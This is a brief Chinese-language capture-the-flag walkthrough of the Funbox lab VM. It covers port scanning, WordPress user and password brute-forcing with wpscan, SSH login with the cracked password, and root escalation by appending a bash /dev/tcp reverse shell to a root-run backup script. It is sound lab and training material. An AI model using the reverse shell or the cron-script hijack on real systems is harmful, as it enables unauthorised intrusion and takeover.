靶机:192.168.111.140
kali:192.168.111.111
端口扫描
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret/
|_http-title: Did not follow redirect to http://funbox.fritz.box/
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
修改/etc/hosts
┌──(root㉿kali)-[~/funbox]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.111.140 funbox.fritz.box #加入改行
发现是个wordpress网站
使用wpscan爆破用户,发现:admin 和 joe 两个用户,接着再爆破密码
joe:12345
admin:iubire
使用joe用户登录ssh,密码12345
使用pspy64,发现root用户会定时执行该脚本/home/funny/.backup.sh,往该脚本写入反弹shell,然后kali使用nc监听5555端口
joe@funbox:/home/funny$ cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
bash -c "bash -i >& /dev/tcp/192.168.111.111/5555 0>&1"
获取flag
root@funbox:~# cat flag.txt
cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2